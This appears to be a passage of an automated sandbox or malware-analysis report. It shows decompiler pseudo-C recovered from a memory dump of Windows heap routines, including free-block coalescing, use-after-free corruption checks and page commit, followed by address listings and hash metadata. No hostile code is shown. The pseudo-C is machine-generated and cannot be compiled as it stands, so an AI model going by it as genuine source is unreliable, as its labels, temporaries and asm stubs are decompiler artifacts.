                                                                            								__eflags =  *(_t307 + 0x4c);
                                                                            								if( *(_t307 + 0x4c) != 0) {
                                                                            									_t390 =  *(_t307 + 0x50) ^  *_t420;
                                                                            									 *_t420 = _t390;
                                                                            									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
                                                                            									__eflags = _t390 >> 0x18 - _t328;
                                                                            									if(__eflags != 0) {
                                                                            										_push(_t328);
                                                                            										E0112FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
                                                                            									}
                                                                            								}
                                                                            								__eflags = _v5;
                                                                            								if(_v5 == 0) {
                                                                            									L94:
                                                                            									_t382 = _t420[3];
                                                                            									_t137 =  &(_t420[2]); // -16
                                                                            									_t309 = _t137;
                                                                            									_t186 =  *_t309;
                                                                            									_v20 = _t186;
                                                                            									_v16 = _t382;
                                                                            									_t187 =  *((intOrPtr*)(_t186 + 4));
                                                                            									__eflags =  *_t382 - _t187;
                                                                            									if( *_t382 != _t187) {
                                                                            										L63:
                                                                            										_push(_t309);
                                                                            										_push( *_t382);
                                                                            										_push(_t187);
                                                                            										_push(_t309);
                                                                            										_push(0xd);
                                                                            										L64:
                                                                            										E0113A80D(_t307);
                                                                            										continue;
                                                                            									}
                                                                            									__eflags =  *_t382 - _t309;
                                                                            									if( *_t382 != _t309) {
                                                                            										goto L63;
                                                                            									}
                                                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
                                                                            									_t393 =  *(_t307 + 0xb4);
                                                                            									__eflags = _t393;
                                                                            									if(_t393 == 0) {
                                                                            										L104:
                                                                            										_t330 = _v16;
                                                                            										_t190 = _v20;
                                                                            										 *_t330 = _t190;
                                                                            										 *(_t190 + 4) = _t330;
                                                                            										__eflags = _t420[0] & 0x00000008;
                                                                            										if((_t420[0] & 0x00000008) == 0) {
                                                                            											L107:
                                                                            											_t331 = _t420[0];
                                                                            											__eflags = _t331 & 0x00000004;
                                                                            											if((_t331 & 0x00000004) != 0) {
                                                                            												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
                                                                            												_v12 = _t196;
                                                                            												__eflags = _t331 & 0x00000002;
                                                                            												if((_t331 & 0x00000002) != 0) {
                                                                            													__eflags = _t196 - 4;
                                                                            													if(_t196 > 4) {
                                                                            														_t196 = _t196 - 4;
                                                                            														__eflags = _t196;
                                                                            														_v12 = _t196;
                                                                            													}
                                                                            												}
                                                                            												_t162 =  &(_t420[4]); // -8
                                                                            												_t197 = E010CD540(_t162, _t196, 0xfeeefeee);
                                                                            												_v20 = _t197;
                                                                            												__eflags = _t197 - _v12;
                                                                            												if(_t197 != _v12) {
                                                                            													_t335 =  *[fs:0x30];
                                                                            													__eflags =  *(_t335 + 0xc);
                                                                            													if( *(_t335 + 0xc) == 0) {
                                                                            														_push("HEAP: ");
                                                                            														E0107B150();
                                                                            													} else {
                                                                            														E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            													}
                                                                            													_push(_v20 + 0x10 + _t420);
                                                                            													E0107B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
                                                                            													_t203 =  *[fs:0x30];
                                                                            													__eflags =  *((char*)(_t203 + 2));
                                                                            													if( *((char*)(_t203 + 2)) != 0) {
                                                                            														 *0x1166378 = 1;
                                                                            														asm("int3");
                                                                            														 *0x1166378 = 0;
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            											_t394 = _a4;
                                                                            											_t414[1] = 0;
                                                                            											_t414[3] = 0;
                                                                            											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
                                                                            											 *_t414 =  *_t394;
                                                                            											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
                                                                            											break;
                                                                            										}
                                                                            										_t207 = E0109A229(_t307, _t420);
                                                                            										__eflags = _t207;
                                                                            										if(_t207 != 0) {
                                                                            											goto L107;
                                                                            										}
                                                                            										E0109A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
                                                                            										continue;
                                                                            									}
                                                                            									_t342 =  *_t420 & 0x0000ffff;
                                                                            									while(1) {
                                                                            										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
                                                                            										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
                                                                            											break;
                                                                            										}
                                                                            										_t210 =  *_t393;
                                                                            										__eflags = _t210;
                                                                            										if(_t210 == 0) {
                                                                            											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                            											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
                                                                            											L103:
                                                                            											_t146 =  &(_t420[2]); // -16
                                                                            											E0109BC04(_t307, _t393, 1, _t146, _t212, _t342);
                                                                            											goto L104;
                                                                            										}
                                                                            										_t393 = _t210;
                                                                            									}
                                                                            									_t212 = _t342;
                                                                            									goto L103;
                                                                            								} else {
                                                                            									_t384 = _t414[6];
                                                                            									_t102 =  &(_t414[4]); // -16
                                                                            									_t311 = _t102;
                                                                            									_t215 =  *_t311;
                                                                            									_v20 = _t215;
                                                                            									_v16 = _t384;
                                                                            									_t216 =  *((intOrPtr*)(_t215 + 4));
                                                                            									__eflags =  *_t384 - _t216;
                                                                            									if( *_t384 != _t216) {
                                                                            										L92:
                                                                            										_push(_t311);
                                                                            										_push( *_t384);
                                                                            										E0113A80D(_t307, 0xd, _t311, _t216);
                                                                            										L93:
                                                                            										_v5 = 0;
                                                                            										goto L94;
                                                                            									}
                                                                            									__eflags =  *_t384 - _t311;
                                                                            									if( *_t384 != _t311) {
                                                                            										goto L92;
                                                                            									}
                                                                            									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
                                                                            									_t386 =  *(_t307 + 0xb4);
                                                                            									__eflags = _t386;
                                                                            									if(_t386 == 0) {
                                                                            										L79:
                                                                            										_t313 = _v16;
                                                                            										_t219 = _v20;
                                                                            										 *_t313 = _t219;
                                                                            										 *(_t219 + 4) = _t313;
                                                                            										__eflags = _t414[1] & 0x00000008;
                                                                            										if((_t414[1] & 0x00000008) == 0) {
                                                                            											L82:
                                                                            											_t314 = _t414[1];
                                                                            											__eflags = _t314 & 0x00000004;
                                                                            											if((_t314 & 0x00000004) != 0) {
                                                                            												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
                                                                            												_v12 = _t221;
                                                                            												__eflags = _t314 & 0x00000002;
                                                                            												if((_t314 & 0x00000002) != 0) {
                                                                            													__eflags = _t221 - 4;
                                                                            													if(_t221 > 4) {
                                                                            														_t221 = _t221 - 4;
                                                                            														__eflags = _t221;
                                                                            														_v12 = _t221;
                                                                            													}
                                                                            												}
                                                                            												_t127 =  &(_t414[8]); // -8
                                                                            												_t222 = E010CD540(_t127, _t221, 0xfeeefeee);
                                                                            												_v20 = _t222;
                                                                            												__eflags = _t222 - _v12;
                                                                            												if(_t222 != _v12) {
                                                                            													_t316 =  *[fs:0x30];
                                                                            													__eflags =  *(_t316 + 0xc);
                                                                            													if( *(_t316 + 0xc) == 0) {
                                                                            														_push("HEAP: ");
                                                                            														E0107B150();
                                                                            													} else {
                                                                            														E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            													}
                                                                            													_push(_v20 + 0x10 + _t414);
                                                                            													E0107B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
                                                                            													_t228 =  *[fs:0x30];
                                                                            													_t421 = _t421 + 0xc;
                                                                            													__eflags =  *((char*)(_t228 + 2));
                                                                            													if( *((char*)(_t228 + 2)) != 0) {
                                                                            														 *0x1166378 = 1;
                                                                            														asm("int3");
                                                                            														 *0x1166378 = 0;
                                                                            													}
                                                                            												}
                                                                            											}
                                                                            											goto L93;
                                                                            										}
                                                                            										_t232 = E0109A229(_t307, _t414);
                                                                            										__eflags = _t232;
                                                                            										if(_t232 != 0) {
                                                                            											goto L82;
                                                                            										}
                                                                            										E0109A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
                                                                            										goto L93;
                                                                            									}
                                                                            									_t323 =  *_t414 & 0x0000ffff;
                                                                            									while(1) {
                                                                            										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
                                                                            										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
                                                                            											break;
                                                                            										}
                                                                            										_t235 =  *_t386;
                                                                            										__eflags = _t235;
                                                                            										if(_t235 == 0) {
                                                                            											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                            											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
                                                                            											L78:
                                                                            											_t111 =  &(_t414[4]); // -16
                                                                            											E0109BC04(_t307, _t386, 1, _t111, _t237, _t323);
                                                                            											goto L79;
                                                                            										}
                                                                            										_t386 = _t235;
                                                                            									}
                                                                            									_t237 = _t323;
                                                                            									goto L78;
                                                                            								}
                                                                            							}
                                                                            							return _t414;
                                                                            						}
                                                                            						_t398 =  *(_t307 + 0x50) ^  *_t420;
                                                                            						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
                                                                            						if(_t398 >> 0x18 != _t347) {
                                                                            							_push(_t347);
                                                                            							_push(0);
                                                                            							_push(0);
                                                                            							_push(_t420);
                                                                            							_push(3);
                                                                            							goto L64;
                                                                            						}
                                                                            						goto L6;
                                                                            					} else {
                                                                            						_t277 =  *_t419 & 0x0000ffff;
                                                                            						_v16 = _t277;
                                                                            						while(1) {
                                                                            							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
                                                                            							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
                                                                            								break;
                                                                            							}
                                                                            							_t279 =  *_t404;
                                                                            							__eflags = _t279;
                                                                            							if(_t279 == 0) {
                                                                            								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                            								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
                                                                            								break;
                                                                            							} else {
                                                                            								_t404 = _t279;
                                                                            								_t277 =  *_t419 & 0x0000ffff;
                                                                            								continue;
                                                                            							}
                                                                            						}
                                                                            						E0109BC04(_t307, _t404, 1, _t350, _t277, _v16);
                                                                            						goto L20;
                                                                            					}
                                                                            				}
                                                                            			}

                                                                            0x010e1817
                                                                            0x010e16eb
                                                                            0x010e16ed
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e16f6
                                                                            0x010e16f9
                                                                            0x010e16ff
                                                                            0x010e1701
                                                                            0x010e172c
                                                                            0x010e172c
                                                                            0x010e172f
                                                                            0x010e1732
                                                                            0x010e1734
                                                                            0x010e1737
                                                                            0x010e173b
                                                                            0x010e175e
                                                                            0x010e175e
                                                                            0x010e1761
                                                                            0x010e1764
                                                                            0x010e176d
                                                                            0x010e1774
                                                                            0x010e1777
                                                                            0x010e177a
                                                                            0x010e177c
                                                                            0x010e177f
                                                                            0x010e1781
                                                                            0x010e1781
                                                                            0x010e1784
                                                                            0x010e1784
                                                                            0x010e177f
                                                                            0x010e178c
                                                                            0x010e1791
                                                                            0x010e1796
                                                                            0x010e1799
                                                                            0x010e179c
                                                                            0x010e179e
                                                                            0x010e17a5
                                                                            0x010e17a9
                                                                            0x010e17c9
                                                                            0x010e17ce
                                                                            0x010e17ab
                                                                            0x010e17c1
                                                                            0x010e17c6
                                                                            0x010e17dc
                                                                            0x010e17e3
                                                                            0x010e17e8
                                                                            0x010e17ee
                                                                            0x010e17f1
                                                                            0x010e17f5
                                                                            0x010e17f7
                                                                            0x010e17fe
                                                                            0x010e17ff
                                                                            0x010e17ff
                                                                            0x010e17f5
                                                                            0x010e179c
                                                                            0x00000000
                                                                            0x010e1764
                                                                            0x010e1741
                                                                            0x010e1746
                                                                            0x010e1748
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1754
                                                                            0x00000000
                                                                            0x010e1754
                                                                            0x010e1703
                                                                            0x010e1710
                                                                            0x010e1710
                                                                            0x010e1713
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e1708
                                                                            0x010e170a
                                                                            0x010e170c
                                                                            0x010e171c
                                                                            0x010e171c
                                                                            0x010e171d
                                                                            0x010e171f
                                                                            0x010e1727
                                                                            0x00000000
                                                                            0x010e1727
                                                                            0x010e170e
                                                                            0x010e170e
                                                                            0x010e1715
                                                                            0x00000000
                                                                            0x010e1715
                                                                            0x010e16cc
                                                                            0x01099a45
                                                                            0x01099a45
                                                                            0x01099a0e
                                                                            0x01099a1c
                                                                            0x01099a23
                                                                            0x010e167e
                                                                            0x010e167f
                                                                            0x010e1681
                                                                            0x010e1683
                                                                            0x010e1684
                                                                            0x00000000
                                                                            0x010e1684
                                                                            0x00000000
                                                                            0x01099aad
                                                                            0x01099aad
                                                                            0x01099ab0
                                                                            0x01099ab3
                                                                            0x01099ab3
                                                                            0x01099ab6
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x01099ab8
                                                                            0x01099aba
                                                                            0x01099abc
                                                                            0x01099ac8
                                                                            0x01099ac8
                                                                            0x00000000
                                                                            0x01099abe
                                                                            0x01099abe
                                                                            0x01099ac0
                                                                            0x00000000
                                                                            0x01099ac0
                                                                            0x01099abc
                                                                            0x01099ad2
                                                                            0x00000000
                                                                            0x01099ad2
                                                                            0x01099aab

                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000007.00000002.300285739.0000000001050000.00000040.00000001.sdmp, Offset: 01050000, based on PE: true
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID: HEAP: $HEAP: Free Heap block %p modified at %p after it was freed$HEAP[%wZ]:
                                                                            • API String ID: 0-3178619729
                                                                            • Opcode ID: 5037a24ebfa675f104a492cd9b44065d81e3d8e8bc646a5fd7f7c6954d95f86d
                                                                            • Instruction ID: 6d9e188185d0f3069a8bcb9379fd4176fc643984a24c250ff9003b3647183cbd
                                                                            • Opcode Fuzzy Hash: 5037a24ebfa675f104a492cd9b44065d81e3d8e8bc646a5fd7f7c6954d95f86d
                                                                            • Instruction Fuzzy Hash: 8F22C170A002469FEB65CF2AC498B7ABBF5EF44704F1885ADE8D68B341E775D881CB50
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E0109B477(signed int __ecx, signed int* __edx) {
                                                                            				signed int _v8;
                                                                            				signed int _v12;
                                                                            				intOrPtr* _v16;
                                                                            				signed int* _v20;
                                                                            				signed int _v24;
                                                                            				char _v28;
                                                                            				signed int _v44;
                                                                            				char _v48;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				signed int _t131;
                                                                            				signed char _t134;
                                                                            				signed int _t139;
                                                                            				void* _t141;
                                                                            				signed int* _t143;
                                                                            				signed int* _t144;
                                                                            				intOrPtr* _t147;
                                                                            				char _t160;
                                                                            				signed int* _t163;
                                                                            				signed char* _t164;
                                                                            				intOrPtr _t165;
                                                                            				signed int* _t167;
                                                                            				signed char* _t168;
                                                                            				intOrPtr _t193;
                                                                            				intOrPtr* _t195;
                                                                            				signed int _t203;
                                                                            				signed int _t209;
                                                                            				signed int _t211;
                                                                            				intOrPtr _t214;
                                                                            				intOrPtr* _t231;
                                                                            				intOrPtr* _t236;
                                                                            				signed int _t237;
                                                                            				intOrPtr* _t238;
                                                                            				signed int _t240;
                                                                            				intOrPtr _t241;
                                                                            				char _t243;
                                                                            				signed int _t252;
                                                                            				signed int _t254;
                                                                            				signed char _t259;
                                                                            				signed int _t264;
                                                                            				signed int _t268;
                                                                            				intOrPtr _t277;
                                                                            				unsigned int _t279;
                                                                            				signed int* _t283;
                                                                            				intOrPtr* _t284;
                                                                            				unsigned int _t287;
                                                                            				signed int _t291;
                                                                            				signed int _t293;
                                                                            
                                                                            				_v8 =  *0x116d360 ^ _t293;
                                                                            				_t223 = __edx;
                                                                            				_v20 = __edx;
                                                                            				_t291 = __ecx;
                                                                            				_t276 =  *__edx;
                                                                            				_t231 = E0109B8E4( *__edx);
                                                                            				_t292 = __ecx + 0x8c;
                                                                            				_v16 = _t231;
                                                                            				if(_t231 == __ecx + 0x8c) {
                                                                            					L38:
                                                                            					_t131 = 0;
                                                                            					L34:
                                                                            					return E010BB640(_t131, _t223, _v8 ^ _t293, _t276, _t291, _t292);
                                                                            				}
                                                                            				if( *0x1168748 >= 1) {
                                                                            					__eflags =  *((intOrPtr*)(_t231 + 0x14)) -  *__edx;
                                                                            					if(__eflags < 0) {
                                                                            						_t214 =  *[fs:0x30];
                                                                            						__eflags =  *(_t214 + 0xc);
                                                                            						if( *(_t214 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E0107B150();
                                                                            						} else {
                                                                            							E0107B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push("(UCRBlock->Size >= *Size)");
                                                                            						E0107B150();
                                                                            						__eflags =  *0x1167bc8;
                                                                            						if(__eflags == 0) {
                                                                            							__eflags = 1;
                                                                            							E01132073(_t223, 1, _t291, 1);
                                                                            						}
                                                                            						_t231 = _v16;
                                                                            					}
                                                                            				}
                                                                            				_t5 = _t231 - 8; // -8
                                                                            				_t292 = _t5;
                                                                            				_t134 =  *((intOrPtr*)(_t292 + 6));
                                                                            				if(_t134 != 0) {
                                                                            					_t223 = (_t292 & 0xffff0000) - ((_t134 & 0x000000ff) << 0x10) + 0x10000;
                                                                            				} else {
                                                                            					_t223 = _t291;
                                                                            				}
                                                                            				_t276 = _v20;
                                                                            				_v28 =  *((intOrPtr*)(_t231 + 0x10));
                                                                            				_t139 =  *(_t291 + 0xcc) ^  *0x1168a68;
                                                                            				_v12 = _t139;
                                                                            				if(_t139 != 0) {
                                                                            					 *0x116b1e0(_t291,  &_v28, _t276);
                                                                            					_t141 = _v12();
                                                                            					goto L8;
                                                                            				} else {
                                                                            					_t203 =  *((intOrPtr*)(_t231 + 0x14));
                                                                            					_v12 = _t203;
                                                                            					if(_t203 -  *_t276 <=  *(_t291 + 0x6c) << 3) {
                                                                            						_t264 = _v12;
                                                                            						__eflags = _t264 -  *(_t291 + 0x5c) << 3;
                                                                            						if(__eflags < 0) {
                                                                            							 *_t276 = _t264;
                                                                            						}
                                                                            					}
                                                                            					_t209 =  *(_t291 + 0x40) & 0x00040000;
                                                                            					asm("sbb ecx, ecx");
                                                                            					_t268 = ( ~_t209 & 0x0000003c) + 4;
                                                                            					_v12 = _t268;
                                                                            					if(_t209 != 0) {
                                                                            						_push(0);
                                                                            						_push(0x14);
                                                                            						_push( &_v48);
                                                                            						_push(3);
                                                                            						_push(_t291);
                                                                            						_push(0xffffffff);
                                                                            						_t211 = E010B9730();
                                                                            						__eflags = _t211;
                                                                            						if(_t211 < 0) {
                                                                            							L56:
                                                                            							_push(_t268);
                                                                            							_t276 = _t291;
                                                                            							E0113A80D(_t291, 1, _v44, 0);
                                                                            							_t268 = 4;
                                                                            							goto L7;
                                                                            						}
                                                                            						__eflags = _v44 & 0x00000060;
                                                                            						if((_v44 & 0x00000060) == 0) {
                                                                            							goto L56;
                                                                            						}
                                                                            						__eflags = _v48 - _t291;
                                                                            						if(__eflags != 0) {
                                                                            							goto L56;
                                                                            						}
                                                                            						_t268 = _v12;
                                                                            					}
                                                                            					L7:
                                                                            					_push(_t268);
                                                                            					_push(0x1000);
                                                                            					_push(_v20);
                                                                            					_push(0);
                                                                            					_push( &_v28);
                                                                            					_push(0xffffffff);
                                                                            					_t141 = E010B9660();
                                                                            					 *((intOrPtr*)(_t291 + 0x20c)) =  *((intOrPtr*)(_t291 + 0x20c)) + 1;
                                                                            					L8:
                                                                            					if(_t141 < 0) {
                                                                            						 *((intOrPtr*)(_t291 + 0x214)) =  *((intOrPtr*)(_t291 + 0x214)) + 1;
                                                                            						goto L38;
                                                                            					}
                                                                            					_t143 =  *( *[fs:0x30] + 0x50);
                                                                            					if(_t143 != 0) {
                                                                            						__eflags =  *_t143;
                                                                            						if(__eflags == 0) {
                                                                            							goto L10;
                                                                            						}
                                                                            						_t144 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                            						L11:
                                                                            						if( *_t144 != 0) {
                                                                            							__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                                                                            							if(__eflags != 0) {
                                                                            								E0113138A(_t223, _t291, _v28,  *_v20, 2);
                                                                            							}
                                                                            						}
                                                                            						if( *((intOrPtr*)(_t291 + 0x4c)) != 0) {
                                                                            							_t287 =  *(_t291 + 0x50) ^  *_t292;
                                                                            							 *_t292 = _t287;
                                                                            							_t259 = _t287 >> 0x00000010 ^ _t287 >> 0x00000008 ^ _t287;
                                                                            							if(_t287 >> 0x18 != _t259) {
                                                                            								_push(_t259);
                                                                            								E0112FA2B(_t223, _t291, _t292, _t291, _t292, __eflags);
                                                                            							}
                                                                            						}
                                                                            						_t147 = _v16 + 8;
                                                                            						 *((char*)(_t292 + 2)) = 0;
                                                                            						 *((char*)(_t292 + 7)) = 0;
                                                                            						_t236 =  *((intOrPtr*)(_t147 + 4));
                                                                            						_t277 =  *_t147;
                                                                            						_v24 = _t236;
                                                                            						_t237 =  *_t236;
                                                                            						_v12 = _t237;
                                                                            						_t238 = _v16;
                                                                            						if(_t237 !=  *((intOrPtr*)(_t277 + 4)) || _v12 != _t147) {
                                                                            							_push(_t238);
                                                                            							_push(_v12);
                                                                            							E0113A80D(0, 0xd, _t147,  *((intOrPtr*)(_t277 + 4)));
                                                                            							_t238 = _v16;
                                                                            						} else {
                                                                            							_t195 = _v24;
                                                                            							 *_t195 = _t277;
                                                                            							 *((intOrPtr*)(_t277 + 4)) = _t195;
                                                                            						}
                                                                            						if( *(_t238 + 0x14) == 0) {
                                                                            							L22:
                                                                            							_t223[0x30] = _t223[0x30] - 1;
                                                                            							_t223[0x2c] = _t223[0x2c] - ( *(_t238 + 0x14) >> 0xc);
                                                                            							 *((intOrPtr*)(_t291 + 0x1e8)) =  *((intOrPtr*)(_t291 + 0x1e8)) +  *(_t238 + 0x14);
                                                                            							 *((intOrPtr*)(_t291 + 0x1fc)) =  *((intOrPtr*)(_t291 + 0x1fc)) + 1;
                                                                            							 *((intOrPtr*)(_t291 + 0x1f8)) =  *((intOrPtr*)(_t291 + 0x1f8)) - 1;
                                                                            							_t279 =  *(_t238 + 0x14);
                                                                            							if(_t279 >= 0x7f000) {
                                                                            								 *((intOrPtr*)(_t291 + 0x1ec)) =  *((intOrPtr*)(_t291 + 0x1ec)) - _t279;
                                                                            								_t279 =  *(_t238 + 0x14);
                                                                            							}
                                                                            							_t152 = _v20;
                                                                            							_t240 =  *_v20;
                                                                            							_v12 = _t240;
                                                                            							_t241 = _v16;
                                                                            							if(_t279 <= _t240) {
                                                                            								__eflags =  *((intOrPtr*)(_t241 + 0x10)) + _t279 - _t223[0x28];
                                                                            								if( *((intOrPtr*)(_t241 + 0x10)) + _t279 != _t223[0x28]) {
                                                                            									 *_v20 = _v12 + ( *_t292 & 0x0000ffff) * 8;
                                                                            									L26:
                                                                            									_t243 = 0;
                                                                            									 *((char*)(_t292 + 3)) = 0;
                                                                            									_t276 = _t223[0x18];
                                                                            									if(_t223[0x18] != _t223) {
                                                                            										_t160 = (_t292 - _t223 >> 0x10) + 1;
                                                                            										_v24 = _t160;
                                                                            										__eflags = _t160 - 0xfe;
                                                                            										if(_t160 >= 0xfe) {
                                                                            											_push(0);
                                                                            											_push(0);
                                                                            											E0113A80D(_t276, 3, _t292, _t223);
                                                                            											_t160 = _v24;
                                                                            										}
                                                                            										_t243 = _t160;
                                                                            									}
                                                                            									 *((char*)(_t292 + 6)) = _t243;
                                                                            									_t163 =  *( *[fs:0x30] + 0x50);
                                                                            									if(_t163 != 0) {
                                                                            										__eflags =  *_t163;
                                                                            										if( *_t163 == 0) {
                                                                            											goto L28;
                                                                            										}
                                                                            										_t227 = 0x7ffe0380;
                                                                            										_t164 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                            										goto L29;
                                                                            									} else {
                                                                            										L28:
                                                                            										_t227 = 0x7ffe0380;
                                                                            										_t164 = 0x7ffe0380;
                                                                            										L29:
                                                                            										if( *_t164 != 0) {
                                                                            											_t165 =  *[fs:0x30];
                                                                            											__eflags =  *(_t165 + 0x240) & 0x00000001;
                                                                            											if(( *(_t165 + 0x240) & 0x00000001) != 0) {
                                                                            												__eflags = E01097D50();
                                                                            												if(__eflags != 0) {
                                                                            													_t227 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                            													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                            												}
                                                                            												_t276 = _t292;
                                                                            												E01131582(_t227, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t227 & 0x000000ff);
                                                                            											}
                                                                            										}
                                                                            										_t223 = 0x7ffe038a;
                                                                            										_t167 =  *( *[fs:0x30] + 0x50);
                                                                            										if(_t167 != 0) {
                                                                            											__eflags =  *_t167;
                                                                            											if( *_t167 == 0) {
                                                                            												goto L31;
                                                                            											}
                                                                            											_t168 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                            											goto L32;
                                                                            										} else {
                                                                            											L31:
                                                                            											_t168 = _t223;
                                                                            											L32:
                                                                            											if( *_t168 != 0) {
                                                                            												__eflags = E01097D50();
                                                                            												if(__eflags != 0) {
                                                                            													_t223 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                            													__eflags =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                            												}
                                                                            												_t276 = _t292;
                                                                            												E01131582(_t223, _t291, _t292, __eflags,  *_v20,  *(_t291 + 0x74) << 3,  *_t223 & 0x000000ff);
                                                                            											}
                                                                            											_t131 = _t292;
                                                                            											goto L34;
                                                                            										}
                                                                            									}
                                                                            								}
                                                                            								_t152 = _v20;
                                                                            							}
                                                                            							E0109B73D(_t291, _t223,  *((intOrPtr*)(_t241 + 0x10)) + _v12 + 0xffffffe8, _t279 - _v12, _t292, _t152);
                                                                            							 *_v20 =  *_v20 << 3;
                                                                            							goto L26;
                                                                            						} else {
                                                                            							_t283 =  *(_t291 + 0xb8);
                                                                            							if(_t283 != 0) {
                                                                            								_t190 =  *(_t238 + 0x14) >> 0xc;
                                                                            								while(1) {
                                                                            									__eflags = _t190 - _t283[1];
                                                                            									if(_t190 < _t283[1]) {
                                                                            										break;
                                                                            									}
                                                                            									_t252 =  *_t283;
                                                                            									__eflags = _t252;
                                                                            									_v24 = _t252;
                                                                            									_t238 = _v16;
                                                                            									if(_t252 == 0) {
                                                                            										_t190 = _t283[1] - 1;
                                                                            										__eflags = _t283[1] - 1;
                                                                            										L70:
                                                                            										E0109BC04(_t291, _t283, 0, _t238, _t190,  *(_t238 + 0x14));
                                                                            										_t238 = _v16;
                                                                            										goto L19;
                                                                            									}
                                                                            									_t283 = _v24;
                                                                            								}
                                                                            								goto L70;
                                                                            							}
                                                                            							L19:
                                                                            							_t193 =  *_t238;
                                                                            							_t284 =  *((intOrPtr*)(_t238 + 4));
                                                                            							_t254 =  *((intOrPtr*)(_t193 + 4));
                                                                            							_v24 = _t254;
                                                                            							_t238 = _v16;
                                                                            							if( *_t284 != _t254 ||  *_t284 != _t238) {
                                                                            								_push(_t238);
                                                                            								_push( *_t284);
                                                                            								E0113A80D(0, 0xd, _t238, _v24);
                                                                            								_t238 = _v16;
                                                                            							} else {
                                                                            								 *_t284 = _t193;
                                                                            								 *((intOrPtr*)(_t193 + 4)) = _t284;
                                                                            							}
                                                                            							goto L22;
                                                                            						}
                                                                            					}
                                                                            					L10:
                                                                            					_t144 = 0x7ffe0380;
                                                                            					goto L11;
                                                                            				}
                                                                            			}
                                                                            0x0109b6f5
                                                                            0x0109b672
                                                                            0x0109b675
                                                                            0x0109b67a
                                                                            0x010e2ae5
                                                                            0x010e2ae8
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2af4
                                                                            0x010e2afc
                                                                            0x00000000
                                                                            0x0109b680
                                                                            0x0109b680
                                                                            0x0109b680
                                                                            0x0109b685
                                                                            0x0109b687
                                                                            0x0109b68a
                                                                            0x010e2b06
                                                                            0x010e2b0c
                                                                            0x010e2b13
                                                                            0x010e2b1e
                                                                            0x010e2b20
                                                                            0x010e2b2b
                                                                            0x010e2b2b
                                                                            0x010e2b2b
                                                                            0x010e2b34
                                                                            0x010e2b45
                                                                            0x010e2b45
                                                                            0x010e2b13
                                                                            0x0109b696
                                                                            0x0109b69b
                                                                            0x0109b6a0
                                                                            0x010e2b4f
                                                                            0x010e2b52
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2b61
                                                                            0x00000000
                                                                            0x0109b6a6
                                                                            0x0109b6a6
                                                                            0x0109b6a6
                                                                            0x0109b6a8
                                                                            0x0109b6ab
                                                                            0x010e2b70
                                                                            0x010e2b72
                                                                            0x010e2b7d
                                                                            0x010e2b7d
                                                                            0x010e2b7d
                                                                            0x010e2b86
                                                                            0x010e2b97
                                                                            0x010e2b97
                                                                            0x0109b6b1
                                                                            0x00000000
                                                                            0x0109b6b1
                                                                            0x0109b6a0
                                                                            0x0109b67a
                                                                            0x0109b722
                                                                            0x0109b722
                                                                            0x0109b655
                                                                            0x0109b65d
                                                                            0x00000000
                                                                            0x0109b5c6
                                                                            0x0109b5c6
                                                                            0x0109b5ce
                                                                            0x010e2a83
                                                                            0x010e2a97
                                                                            0x010e2a97
                                                                            0x010e2a9a
                                                                            0x00000000
                                                                            0x00000000
                                                                            0x010e2a88
                                                                            0x010e2a8a
                                                                            0x010e2a8c
                                                                            0x010e2a8f
